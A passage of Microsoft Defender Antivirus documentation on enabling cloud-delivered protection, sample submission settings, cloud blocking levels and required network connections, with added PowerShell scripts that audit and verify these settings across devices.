Set-MpPreference -MAPSReporting Advanced
Set-MpPreference -SubmitSamplesConsent SendAllSamples

For more information on how to use PowerShell with Microsoft Defender Antivirus, see
Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Microsoft Defender Antivirus cmdlets. Policy CSP - Defender also has more information
specifically on -SubmitSamplesConsent.

Important

You can set -SubmitSamplesConsent to SendSafeSamples (the default, recommended
setting), SendAllSamples, NeverSend, or AlwaysPrompt. The SendSafeSamples setting
means that most samples are sent automatically; files that are likely to contain
personal information result in a prompt for the user to continue, and require
confirmation. SendAllSamples submits those files as well, without prompting. The
NeverSend and AlwaysPrompt settings lower the protection level of the device.
Furthermore, the NeverSend setting means that the Block at First Sight feature of
Microsoft Defender for Endpoint won't work.
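As an added, worked example (not code from the Microsoft documentation), the following script applies the two cmdlets above and then reads the settings back, because a Set-MpPreference call that is overridden by policy or ignored by tamper protection still returns without error. It assumes the Defender PowerShell module is present (Windows 10/11 or Windows Server with the Defender feature), an elevated session, and the numeric-to-name mappings shown in the script; the desired values at the top are placeholders you set for your environment.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the Microsoft documentation: enforce cloud protection
# on the local device, then verify by reading the preferences back.
# Assumptions: Defender PowerShell module available; elevated session.

# Desired state (placeholders). SendSafeSamples is the default; SendAllSamples also
# submits files that may contain personal data, such as Office documents with macros.
$DesiredMaps    = 'Advanced'        # Basic or Advanced; Disabled turns cloud protection off
$DesiredConsent = 'SendSafeSamples' # AlwaysPrompt, SendSafeSamples, NeverSend, SendAllSamples

# Numeric values as reported by Get-MpPreference (and used by the policy keys).
$MapsNames    = @{ 0 = 'Disabled'; 1 = 'Basic'; 2 = 'Advanced' }
$ConsentNames = @{ 0 = 'AlwaysPrompt'; 1 = 'SendSafeSamples'; 2 = 'NeverSend'; 3 = 'SendAllSamples' }

function Get-CloudProtectionState {
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    [pscustomobject]@{
        MAPSReporting        = $MapsNames[[int]$pref.MAPSReporting]
        SubmitSamplesConsent = $ConsentNames[[int]$pref.SubmitSamplesConsent]
        BlockAtFirstSeen     = -not $pref.DisableBlockAtFirstSeen
        TamperProtected      = $status.IsTamperProtected
        RealTimeProtection   = $status.RealTimeProtectionEnabled
    }
}

$before = Get-CloudProtectionState
Write-Host 'Before:'
$before | Format-List

# Tamper protection silently ignores changes to protected settings, so a
# "successful" Set-MpPreference is not proof that anything changed.
if ($before.TamperProtected) {
    Write-Warning 'Tamper protection is on: local changes to cloud protection are ignored. Use Intune or troubleshooting mode.'
}

Set-MpPreference -MAPSReporting $DesiredMaps -SubmitSamplesConsent $DesiredConsent

$after = Get-CloudProtectionState
Write-Host 'After:'
$after | Format-List

# Verify by reading back, and flag the one value that disables block at first sight.
if ($after.MAPSReporting -ne $DesiredMaps -or $after.SubmitSamplesConsent -ne $DesiredConsent) {
    Write-Error 'Cloud protection settings did not apply (policy or tamper protection is overriding them).'
}
if ($after.SubmitSamplesConsent -eq 'NeverSend') {
    Write-Warning 'SubmitSamplesConsent is NeverSend: block at first sight will not work.'
}
```

Reading the state back through Get-MpPreference and Get-MpComputerStatus is the same check an auditor would do after a Group Policy or Intune deployment; the cmdlet call itself never tells you whether a policy-managed or tamper-protected value was actually changed.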

Use Windows Management Instrumentation (WMI) to turn on cloud protection

Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

MAPSReporting
SubmitSamplesConsent

For more information about allowed parameters, see Windows Defender WMIv2 APIs.
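As an added example (not from the documentation) of the WMIv2 path, the following script reads MSFT_MpPreference over CIM from several devices and reports those where cloud protection is off or sample submission is set to never send. The computer names are placeholders; it assumes WinRM is enabled on the targets and that the caller is an administrator there. The commented Invoke-CimMethod call shows the class's static Set method for remediation, with uint8 argument types assumed from the class documentation.

```powershell
# Added example, not from the Microsoft documentation: fleet audit of cloud
# protection settings through the MSFT_MpPreference CIM class.
# Assumptions: WinRM/CIM remoting enabled on targets; caller is a local admin there;
# computer names below are placeholders.

$Computers = @('WS-001', 'WS-002', 'SRV-FILE01')
$Namespace = 'root/Microsoft/Windows/Defender'

$MapsNames    = @{ 0 = 'Disabled'; 1 = 'Basic'; 2 = 'Advanced' }
$ConsentNames = @{ 0 = 'AlwaysPrompt'; 1 = 'SendSafeSamples'; 2 = 'NeverSend'; 3 = 'SendAllSamples' }

function Get-RemoteCloudProtection {
    param([Parameter(Mandatory)][string]$ComputerName)
    try {
        $pref = Get-CimInstance -ComputerName $ComputerName -Namespace $Namespace `
                                -ClassName MSFT_MpPreference -ErrorAction Stop
        [pscustomobject]@{
            Computer             = $ComputerName
            MAPSReporting        = $MapsNames[[int]$pref.MAPSReporting]
            SubmitSamplesConsent = $ConsentNames[[int]$pref.SubmitSamplesConsent]
            CloudEnabled         = ([int]$pref.MAPSReporting -ne 0)
            Error                = $null
        }
    } catch {
        # Unreachable or unmanaged devices count as drift too: they can't be verified.
        [pscustomobject]@{
            Computer             = $ComputerName
            MAPSReporting        = $null
            SubmitSamplesConsent = $null
            CloudEnabled         = $false
            Error                = $_.Exception.Message
        }
    }
}

$report = $Computers | ForEach-Object { Get-RemoteCloudProtection -ComputerName $_ }
$report | Format-Table -AutoSize

# Cloud protection off, sample submission NeverSend (which disables block at first
# sight), or no answer at all: all three need follow-up.
$drift = $report | Where-Object { -not $_.CloudEnabled -or $_.SubmitSamplesConsent -eq 'NeverSend' -or $_.Error }
if ($drift) {
    Write-Warning ('Cloud protection drift on: ' + ($drift.Computer -join ', '))
}

# Remediation through the same API uses the class's static Set method, e.g.
# (values: MAPSReporting 2 = Advanced, SubmitSamplesConsent 1 = SendSafeSamples):
#   Invoke-CimMethod -ComputerName $name -Namespace $Namespace -ClassName MSFT_MpPreference `
#       -MethodName Set -Arguments @{ MAPSReporting = [byte]2; SubmitSamplesConsent = [byte]1 }
```

The numeric values this class exposes are the same ones the Group Policy settings above store (Send safe samples = 1, Send all samples = 3), so one mapping table serves both audits.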

Turn on cloud protection on individual clients with the Windows Security app

Note

If the Configure local setting override for reporting Microsoft MAPS Group Policy
setting is set to Disabled, then the Cloud-based protection setting in Windows
Settings is greyed out and unavailable. Changes made through a Group Policy
Object must first be deployed to individual endpoints before the setting is updated
in Windows Settings.

1. Open the Windows Security app by selecting the shield icon in the task bar, or by
searching the start menu for Windows Security.

2. Select the Virus & threat protection tile (or the shield icon on the left menu bar),
and then, under Virus & threat protection settings, select Manage settings.

3. Confirm that Cloud-based Protection and Automatic sample submission are
switched to On.

Note

If automatic sample submission has been configured with Group Policy, then
the setting is greyed out and unavailable.

See also
Use Microsoft cloud protection in Microsoft Defender Antivirus

Configuration Manager: Microsoft Defender for Endpoint

Use PowerShell cmdlets to manage Microsoft Defender Antivirus

Tip

If you're looking for antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Specify the cloud protection level
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Cloud protection works together with Microsoft Defender Antivirus to deliver protection
to your devices faster than through traditional security intelligence updates. You can
configure your level of cloud protection by using Microsoft Intune (recommended) or
Group Policy.

Use Microsoft Intune to specify the level of cloud protection

1. Go to the Microsoft Intune admin center (https://endpoint.microsoft.com) and
sign in.

2. Choose Endpoint security > Antivirus.

3. Select an antivirus profile. If you don't have one yet, or if you want to create a new
profile, see Configure device restriction settings in Microsoft Intune.

4. Select Properties. Then, next to Configuration settings, choose Edit.

5. Expand Cloud protection, and then in the Cloud-delivered protection level list,
select one of the following:

Not configured: Default state.
High: Applies a strong level of detection.
High plus: Uses the High level and applies extra protection measures (might
affect client performance).
Zero tolerance: Blocks all unknown executables.

6. Choose Review + save, and then choose Save.


Tip

Need some help? See the following resources:

Manage device security with endpoint security policies in Microsoft Intune
Configure Endpoint Protection (Configuration Manager)

Use Group Policy to specify the level of cloud protection

1. On your Group Policy management machine, open the Group Policy Management
Console.

2. Right-click the Group Policy Object you want to configure, and then select Edit.

3. In the Group Policy Management Editor, go to Computer Configuration >
Administrative templates.

4. Expand the tree to Windows Components > Microsoft Defender Antivirus >
MpEngine.

5. Double-click the Select cloud protection level setting, and set it to Enabled.

6. Under Select cloud blocking level, set the level of protection:

Default blocking level provides strong detection without increasing the risk
of detecting legitimate files.
Moderate blocking level delivers a cloud verdict only for high-confidence
detections.
High blocking level applies a strong level of detection while optimizing client
performance (but can also give you a greater chance of false positives).
High + blocking level applies extra protection measures (might affect client
performance and increase your chance of false positives).
Zero tolerance blocking level blocks all unknown executables.

Caution

If you're using Resultant Set of Policy (RSOP) with Group Policy and Default
blocking level is selected, RSOP can produce misleading results, because a
setting with a 0 value is read as disabled by RSOP. Instead, confirm that the
policy value is present under the registry key
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Defender\MpEngine, or use GPresult.

7. Select OK.

8. Deploy your updated Group Policy Object. See Group Policy Management Console
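As an added example (not from the documentation), the following script reports the cloud protection level a device is actually using and whether Group Policy set it, which sidesteps the RSOP pitfall in the Caution above: the Default level is stored as 0, and RSOP shows a 0 as "disabled". It assumes the Defender PowerShell module is available and that the policy value is the DWORD MpCloudBlockLevel under the MpEngine policy key named in the Caution; the level names follow the values accepted by Set-MpPreference -CloudBlockLevel.

```powershell
# Added example, not from the Microsoft documentation: report the effective cloud
# blocking level and whether a Group Policy value is controlling it.
# Assumptions: Defender PowerShell module available; policy value name is
# MpCloudBlockLevel under the MpEngine policy key.

$PolicyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine'
$LevelNames = @{ 0 = 'Default'; 1 = 'Moderate'; 2 = 'High'; 4 = 'HighPlus'; 6 = 'ZeroTolerance' }

function Get-CloudBlockLevelReport {
    # Effective level as the engine reports it; policy takes precedence over local preference.
    $effective = [int](Get-MpPreference).CloudBlockLevel

    # For the policy, presence of the value is the signal, not its magnitude:
    # a value of 0 means "policy enabled, Default level", not "disabled".
    $policy = Get-ItemProperty -Path $PolicyKey -Name MpCloudBlockLevel -ErrorAction SilentlyContinue
    $policyLevel = if ($null -ne $policy) { [int]$policy.MpCloudBlockLevel } else { $null }

    [pscustomobject]@{
        EffectiveLevel = $LevelNames[$effective]
        PolicyApplied  = ($null -ne $policyLevel)
        PolicyLevel    = if ($null -ne $policyLevel) { $LevelNames[$policyLevel] } else { 'not set' }
        Consistent     = ($null -eq $policyLevel) -or ($policyLevel -eq $effective)
    }
}

$report = Get-CloudBlockLevelReport
$report | Format-List

if (-not $report.Consistent) {
    # A policy value exists but the engine reports something else: the GPO has not
    # been applied yet, or the service has not picked it up. Refresh and re-check.
    gpupdate /target:computer /force | Out-Null
    Get-CloudBlockLevelReport | Format-List
}

# To raise the level locally where no policy controls it (ignored under tamper
# protection or when the policy value above is present):
#   Set-MpPreference -CloudBlockLevel High
```

Run this on a device after step 8 to confirm the deployment landed; the PolicyApplied field is the check the Caution recommends, expressed as a registry read rather than an RSOP query.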

 Tip

Are you using Group Policy Objects on premises? See how they translate in the
cloud. Analyze your on-premises group policy objects using Group Policy
analytics in Microsoft Intune.

See also
Onboard non-Windows devices to Defender for Endpoint
Turn on cloud protection in Microsoft Defender Antivirus

Cloud protection and sample
submission at Microsoft Defender
Antivirus
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

macOS

Linux

Windows Server

Microsoft Defender Antivirus uses many intelligent mechanisms for detecting malware.
One of the most powerful capabilities is the ability to apply the power of the cloud to
detect malware and perform rapid analysis. Cloud protection and automatic sample
submission work together with Microsoft Defender Antivirus to help protect against new
and emerging threats.

If a suspicious or malicious file is detected, a sample is sent to the cloud service for
analysis while Microsoft Defender Antivirus blocks the file. As soon as a determination is
made, which happens quickly, the file is either released or blocked by Microsoft
Defender Antivirus.

This article provides an overview of cloud protection and automatic sample submission
in Microsoft Defender Antivirus. To learn more about cloud protection, see Cloud
protection and Microsoft Defender Antivirus.

How cloud protection and sample submission work together

To understand how cloud protection works together with sample submission, it can be
helpful to understand how Defender for Endpoint protects against threats. The
Microsoft Intelligent Security Graph monitors threat data from a vast network of sensors.
Microsoft layers cloud-based machine-learning models that can assess files based on
signals from the client and the vast network of sensors and data in the Intelligent
Security Graph. This approach gives Defender for Endpoint the ability to block many
never-before-seen threats.

The following image depicts the flow of cloud protection and sample submission with
Microsoft Defender Antivirus:

Microsoft Defender Antivirus and cloud protection automatically block most new, never-
before-seen threats at first sight by using the following methods:

1. Lightweight client-based machine-learning models, blocking new and unknown
malware.

2. Local behavioral analysis, stopping file-based and file-less attacks.

3. High-precision antivirus, detecting common malware through generic and heuristic
techniques.

4. Advanced cloud-based protection, for cases in which Microsoft Defender Antivirus
running on the endpoint needs more intelligence to verify the intent of a suspicious
file.

   a. If Microsoft Defender Antivirus can't make a clear determination, file metadata
   is sent to the cloud protection service. Often within milliseconds, the cloud
   protection service determines from the metadata whether the file is malicious or
   not a threat.

      The cloud query of file metadata can be triggered by behavior, mark of the
      web, or other characteristics for which a clear verdict isn't determined.
      A small metadata payload is sent, with the goal of reaching a verdict of
      malware or not a threat. The metadata doesn't include personally
      identifiable information (PII); information such as filenames is hashed.
      The query can be synchronous or asynchronous. For a synchronous query, the
      file won't open until the cloud renders a verdict. For an asynchronous query,
      the file opens while cloud protection performs its analysis.
      Metadata can include PE attributes, static file attributes, dynamic and
      contextual attributes, and more (see Examples of metadata sent to the
      cloud protection service).

   b. After examining the metadata, if Microsoft Defender Antivirus cloud protection
   can't reach a conclusive verdict, it can request a sample of the file for further
   inspection. This request honors the configured sample submission setting:

      i. Send safe samples automatically
         Safe samples are file types that don't commonly contain PII, such as
         .bat, .scr, .dll, and .exe.
         If a file is likely to contain PII, the user is asked to allow the file
         sample submission.
         This option is the default on Windows, macOS, and Linux.

      ii. Always prompt
         If configured, the user is always prompted for consent before file
         submission.
         This setting isn't available in macOS and Linux cloud protection.

      iii. Send all samples automatically
         If configured, all samples are sent automatically.
         If you want sample submission to include macros embedded in Word
         documents, you must choose "Send all samples automatically".
         This setting isn't available in macOS cloud protection.

      iv. Do not send
         Prevents "block at first sight" based on file sample analysis.
         "Don't send" is equivalent to the "Disabled" setting in macOS policy
         and the "None" setting in Linux policy.
         Metadata is still sent for detections even when sample submission is
         disabled.

   c. After files are submitted to cloud protection, the submitted files can be
   scanned, detonated, and processed through big-data analysis and machine-
   learning models to reach a verdict. Turning off cloud-delivered protection limits
   analysis to what the client can provide through local machine-learning
   models and similar functions.

Important

Block at first sight (BAFS) provides detonation and analysis to determine whether a
file or process is safe. BAFS can delay the opening of a file momentarily until a
verdict is reached. If you disable sample submission, BAFS is also disabled, and file
analysis is limited to metadata only. We recommend keeping sample submission
and BAFS enabled. To learn more, see What is "block at first sight"?

Cloud protection levels

Cloud protection is enabled by default in Microsoft Defender Antivirus. We recommend
that you keep cloud protection enabled, although you can configure the protection level
for your organization. See Specify the cloud-delivered protection level for Microsoft
Defender Antivirus.

Sample submission settings

In addition to configuring your cloud protection level, you can configure your sample
submission settings. You can choose from several options:

Send safe samples automatically (the default behavior)
Send all samples automatically
Do not send samples

Tip

The Send all samples automatically option provides better security, because
phishing is a common initial-access technique, and the files it delivers (such as
Office documents with embedded macros) are submitted only when all samples are
sent. For information about configuration options using Intune, Configuration
Manager, Group Policy, or PowerShell, see Turn on cloud protection in Microsoft
Defender Antivirus.

Examples of metadata sent to the cloud protection service

The following table lists examples of metadata sent for analysis by cloud protection:

Type: Machine attributes
Attributes: OS version; Processor; Security settings

Type: Dynamic and contextual attributes
Attributes:
   Process and installation: ProcessName, ParentProcess, TriggeringSignature,
   TriggeringFile, Download IP and URL, HashedFullPath, Vpath, RealPath,
   Parent/child relationships
   Behavioral: Connection IPs, System changes, API calls, Process injection
   Locale: Locale setting, Geographical location

Type: Static file attributes
Attributes:
   Partial and full hashes: ClusterHash, Crc16, Ctph, ExtendedKcrcs, ImpHash,
   Kcrc3n, Lshash, LsHashs, PartialCrc1, PartialCrc2, PartialCrc3, Sha1, Sha256
   File properties: FileName, FileSize
   Signer information: AuthentiCodeHash, Issuer, IssuerHash, Publisher, Signer,
   SignerHash
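As an added example (not from the documentation) tying the table to what you can observe locally, the following function computes, for one file, the static file attributes and signer information that built-in cmdlets can produce (file name and size, SHA-1, SHA-256, Authenticode signer, issuer and signer thumbprint), plus the mark-of-the-web flag mentioned in the flow above. The fuzzy and partial hashes (Ctph, ImpHash, the PartialCrc and Kcrc values) need the engine or third-party tools and are not computed. The SHA-256 of the lowercased path stands in for HashedFullPath; the exact hashing scheme Microsoft uses is not documented on this page, so that field is an illustration. The sample path is a placeholder.

```powershell
# Added example, not from the Microsoft documentation: derive the locally
# observable static and signer attributes for a file, in the shape of the table above.
# Assumptions: NTFS volume (for the Zone.Identifier stream); the path hashing is
# illustrative (SHA-256 of the lowercased full path), not Microsoft's scheme.

function Get-CloudQueryMetadata {
    param([Parameter(Mandatory)][string]$Path)

    $file = Get-Item -LiteralPath $Path
    $sig  = Get-AuthenticodeSignature -LiteralPath $Path

    # Illustrative stand-in for HashedFullPath: the client sends a hash, not the path.
    $sha256   = [System.Security.Cryptography.SHA256]::Create()
    $pathHash = ($sha256.ComputeHash([System.Text.Encoding]::Unicode.GetBytes($file.FullName.ToLowerInvariant())) |
                 ForEach-Object { $_.ToString('x2') }) -join ''

    # Mark of the web is one of the triggers for a cloud query; it lives in the
    # Zone.Identifier alternate data stream, absent for locally created files.
    $motw = $null -ne (Get-Item -LiteralPath $Path -Stream Zone.Identifier -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        FileName       = $file.Name
        FileSize       = $file.Length
        HashedFullPath = $pathHash
        Sha1           = (Get-FileHash -LiteralPath $Path -Algorithm SHA1).Hash
        Sha256         = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
        SignatureState = $sig.Status      # Valid, NotSigned, HashMismatch, ...
        Signer         = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject }     else { $null }
        SignerHash     = if ($sig.SignerCertificate) { $sig.SignerCertificate.Thumbprint }  else { $null }
        Issuer         = if ($sig.SignerCertificate) { $sig.SignerCertificate.Issuer }      else { $null }
        MarkOfTheWeb   = $motw
    }
}

# Placeholder input: a signed system binary, so the signer fields are populated.
Get-CloudQueryMetadata -Path "$env:SystemRoot\System32\notepad.exe" | Format-List
```

Running it against a freshly downloaded executable shows MarkOfTheWeb set and, for unsigned files, SignatureState NotSigned with empty signer fields, which is the combination most likely to end in a sample request under step b above.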

Samples are treated as customer data


Just in case you're wondering what happens with sample submissions, Defender for
Endpoint treats all file samples as customer data. Microsoft honors both the
geographical and data retention choices your organization selected when onboarding
to Defender for Endpoint.
In addition, Defender for Endpoint has received multiple compliance certifications,
demonstrating continued adherence to a sophisticated set of compliance controls:

ISO 27001
ISO 27018
SOC I, II, III
PCI

For more information, see the following resources:

Azure Compliance Offerings
Service Trust Portal
Microsoft Defender for Endpoint data storage and privacy

Other file sample submission scenarios

There are two more scenarios where Defender for Endpoint might request a file sample
that isn't related to cloud protection in Microsoft Defender Antivirus. These
scenarios are described in the following table:

Scenario: Manual file sample collection in the Microsoft Defender portal
Description: When onboarding devices to Defender for Endpoint, you can configure
settings for endpoint detection and response (EDR). For example, there's a setting to
enable sample collection from the device, which can easily be confused with the sample
submission settings described in this article.
The EDR setting controls file sample collection from devices when requested through the
Microsoft Defender portal, and is subject to the roles and permissions already
established. This setting can allow or block file collection from the endpoint for features
such as deep analysis in the Microsoft Defender portal. If this setting isn't configured,
the default is to enable sample collection.
To learn about Defender for Endpoint configuration settings, see Onboarding tools and
methods for Windows 10 devices in Defender for Endpoint.

Scenario: Automated investigation and response content analysis
Description: When automated investigations are running on devices (whether configured
to run automatically in response to an alert or run manually), files that are identified as
suspicious can be collected from the endpoints for further inspection. If necessary, the
file content analysis feature for automated investigations can be disabled in the
Microsoft Defender portal. The file extension names can also be modified to add or
remove extensions for other file types that are automatically submitted during an
automated investigation.
To learn more, see Manage automation file uploads.

Tip

If you're looking for antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

See also
Next-generation protection overview

Configure remediation for Microsoft Defender Antivirus detections.

Configure and validate Microsoft
Defender Antivirus network connections
Article • 06/26/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

To ensure that Microsoft Defender Antivirus cloud-delivered protection works properly, your
security team must configure your network to allow connections between your
endpoints and certain Microsoft servers. This article lists the connections that your
firewall rules must allow, and provides instructions for validating your connection.
Configuring your protection properly ensures that you receive the best value from your
cloud-delivered protection services.

Important

This article contains information about configuring network connections only for
Microsoft Defender Antivirus. If you are using Microsoft Defender for Endpoint
(which includes Microsoft Defender Antivirus), see Configure device proxy and
Internet connectivity settings for Defender for Endpoint.

Allow connections to the Microsoft Defender Antivirus cloud service

The Microsoft Defender Antivirus cloud service provides fast and strong protection for
your endpoints. Enabling the cloud-delivered protection service is optional, but the
Microsoft Defender Antivirus cloud service is recommended, because it provides important
protection against malware on your endpoints and network. For more information, see
Enable cloud-delivered protection for enabling the service with Intune, Microsoft Endpoint
Configuration Manager, Group Policy, PowerShell cmdlets, or individual clients in the
Windows Security app.

After you've enabled the service, you need to configure your network or firewall to allow
connections between your network and your endpoints. Because your protection is a cloud
service, computers must have access to the internet and be able to reach the Microsoft cloud
services. Don't exclude the URL *.blob.core.windows.net from any kind of network
inspection.

Note

The Microsoft Defender Antivirus cloud service delivers updated protection to your
network and endpoints. The cloud service should not be considered only as
protection for files that are stored in the cloud; instead, the cloud service uses
distributed resources and machine learning to deliver protection for your endpoints
at a faster rate than the traditional Security intelligence updates.

Services and URLs

The table in this section lists services and their associated website addresses (URLs).

Make sure that there are no firewall or network filtering rules denying access to these
URLs. Otherwise, you must create an allow rule specifically for those URLs (excluding the
URL *.blob.core.windows.net ). The URLs in the following table use port 443 for
communication. (Port 80 is also required for some URLs, as noted in the following table.)


Service: Microsoft Defender Antivirus cloud-delivered protection service
Description: The cloud-delivered protection service is referred to as Microsoft Active
Protection Service (MAPS). Microsoft Defender Antivirus uses the MAPS service to
provide cloud-delivered protection.
URLs:
    *.wdcp.microsoft.com
    *.wdcpalt.microsoft.com
    *.wd.microsoft.com

Service: Microsoft Update Service (MU) and Windows Update Service (WU)
Description: These services allow security intelligence and product updates. For more
information, see Connection endpoints for Windows Update.
URLs:
    *.update.microsoft.com
    *.delivery.mp.microsoft.com
    *.windowsupdate.com
    ctldl.windowsupdate.com

Service: Security intelligence updates Alternate Download Location (ADL)
Description: This is an alternate location for Microsoft Defender Antivirus Security
intelligence updates, if the installed Security intelligence is out of date (seven or
more days behind).
URLs:
    *.download.microsoft.com
    *.download.windowsupdate.com (Port 80 is required)
    go.microsoft.com (Port 80 is required)
    https://www.microsoft.com/security/encyclopedia/adlpackages.aspx
    https://definitionupdates.microsoft.com/download/DefinitionUpdates/
    https://fe3cr.delivery.mp.microsoft.com/ClientWebService/client.asmx

Service: Malware submission storage
Description: This is an upload location for files submitted to Microsoft via the
Submission form or automatic sample submission.
URLs:
    ussus1eastprod.blob.core.windows.net
    ussus2eastprod.blob.core.windows.net
    ussus3eastprod.blob.core.windows.net
    ussus4eastprod.blob.core.windows.net
    wsus1eastprod.blob.core.windows.net
    wsus2eastprod.blob.core.windows.net
    ussus1westprod.blob.core.windows.net
    ussus2westprod.blob.core.windows.net
    ussus3westprod.blob.core.windows.net
    ussus4westprod.blob.core.windows.net
    wsus1westprod.blob.core.windows.net
    wsus2westprod.blob.core.windows.net
    usseu1northprod.blob.core.windows.net
    wseu1northprod.blob.core.windows.net
    usseu1westprod.blob.core.windows.net
    wseu1westprod.blob.core.windows.net
    ussuk1southprod.blob.core.windows.net
    wsuk1southprod.blob.core.windows.net
    ussuk1westprod.blob.core.windows.net
    wsuk1westprod.blob.core.windows.net

Service: Certificate Revocation List (CRL)
Description: Windows uses this list while creating the SSL connection to MAPS for
updating the CRL.
URLs:
    http://www.microsoft.com/pkiops/crl/
    http://www.microsoft.com/pkiops/certs
    http://crl.microsoft.com/pki/crl/products
    http://www.microsoft.com/pki/certs

Service: Universal GDPR Client
Description: Windows uses this client to send the client diagnostic data. Microsoft
Defender Antivirus uses General Data Protection Regulation for product quality and
monitoring purposes. The update uses SSL (TCP Port 443) to download manifests and
upload diagnostic data to Microsoft, using the following DNS endpoints:
    vortex-win.data.microsoft.com
    settings-win.data.microsoft.com

Validate connections between your network and the cloud

After allowing the URLs listed, test whether you're connected to the Microsoft Defender
Antivirus cloud service. Test that the URLs are correctly reporting and receiving
information to ensure you're fully protected.

Use the command-line tool to validate cloud-delivered protection

Use the following argument with the Microsoft Defender Antivirus command-line utility
(mpcmdrun.exe) to verify that your network can communicate with the Microsoft
Defender Antivirus cloud service:

Console
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -ValidateMapsConnection

Note

Open Command Prompt as an administrator. Right-click the item in the Start
menu, click Run as administrator and click Yes at the permissions prompt. This
command will only work on Windows 10, version 1703 or higher, or Windows 11.

For more information, see Manage Microsoft Defender Antivirus with the mpcmdrun.exe
command-line tool.

Attempt to download a fake malware file from Microsoft

You can download a sample file that Microsoft Defender Antivirus will detect and block
if you're properly connected to the cloud. Visit https://aka.ms/ioavtest1 to download
the file.

Note

The downloaded file is not exactly malware. It's a fake file designed to test if you're
properly connected to the cloud.

If you're properly connected, you'll see a Microsoft Defender Antivirus warning
notification.

If you're using Microsoft Edge, you'll also see a notification message:


A similar message occurs if you're using Internet Explorer:


View the fake malware detection in your Windows Security app

1. On your task bar, select the Shield icon to open the Windows Security app. Or,
search Start for Security.

2. Select Virus & threat protection, and then select Protection history.

3. Under the Quarantined threats section, select See full history to see the
detected fake malware.

Note

Versions of Windows 10 before version 1703 have a different user interface.
See Microsoft Defender Antivirus in the Windows Security app.

The Windows event log will also show Windows Defender client event ID 1116.
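The three checks in this section (endpoint reachability, MpCmdRun -ValidateMapsConnection, and the Event ID 1116 record) can be run together from PowerShell. The script below is an added example, not part of the Microsoft article; the function names are mine, and it probes only the literal hostnames from the table above, since wildcard entries such as *.wdcp.microsoft.com can't be tested directly.

```powershell
# Added example (not from the Microsoft article). Run from an elevated PowerShell
# prompt on Windows 10 version 1703 or later, or Windows 11. Function names are mine.

# Literal hostnames taken from the article's table. Wildcard entries such as
# *.wdcp.microsoft.com cannot be probed directly and are therefore not listed here.
$DefenderEndpoints = @(
    @{ Host = 'ctldl.windowsupdate.com';              Ports = @(443) }
    @{ Host = 'go.microsoft.com';                     Ports = @(443, 80) }  # port 80 required per the table
    @{ Host = 'definitionupdates.microsoft.com';      Ports = @(443) }
    @{ Host = 'fe3cr.delivery.mp.microsoft.com';      Ports = @(443) }
    @{ Host = 'www.microsoft.com';                    Ports = @(443, 80) }  # ADL (https) and CRL (http) URLs
    @{ Host = 'crl.microsoft.com';                    Ports = @(80) }       # CRL URL is http://
    @{ Host = 'vortex-win.data.microsoft.com';        Ports = @(443) }
    @{ Host = 'settings-win.data.microsoft.com';      Ports = @(443) }
    @{ Host = 'ussus1eastprod.blob.core.windows.net'; Ports = @(443) }      # one of the submission storage hosts
)

function Test-DefenderEndpointReachability {
    # One TCP connect per host/port. A failed test usually means a firewall or proxy
    # rule is blocking the path and an allow rule for that URL is needed.
    foreach ($entry in $DefenderEndpoints) {
        foreach ($port in $entry.Ports) {
            $result = Test-NetConnection -ComputerName $entry.Host -Port $port -WarningAction SilentlyContinue
            [pscustomobject]@{
                Host          = $entry.Host
                Port          = $port
                Reachable     = $result.TcpTestSucceeded
                RemoteAddress = $result.RemoteAddress
            }
        }
    }
}

function Test-MapsConnection {
    # Wraps the article's MpCmdRun.exe -ValidateMapsConnection call. Exit code 0
    # means the MAPS connection was established; the captured output explains failures.
    $mpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
    $output = & $mpCmdRun -ValidateMapsConnection 2>&1
    [pscustomobject]@{
        Succeeded = ($LASTEXITCODE -eq 0)
        ExitCode  = $LASTEXITCODE
        Output    = ($output -join [Environment]::NewLine)
    }
}

function Get-DefenderDetectionEvents {
    # Event ID 1116 in the Defender operational log is written when a threat is detected;
    # the article's fake-malware download (https://aka.ms/ioavtest1) produces one.
    param([int]$Hours = 1)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1116
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
            @{ Name = 'Summary'; Expression = { ($_.Message -split "`r?`n")[0] } }
}

Test-DefenderEndpointReachability | Format-Table -AutoSize
Test-MapsConnection | Format-List
Get-DefenderDetectionEvents -Hours 24 | Format-Table -AutoSize
```

An empty result from Get-DefenderDetectionEvents after the fake-malware download, combined with a successful MAPS check, points at the download itself (browser or proxy) rather than at cloud connectivity.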

Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
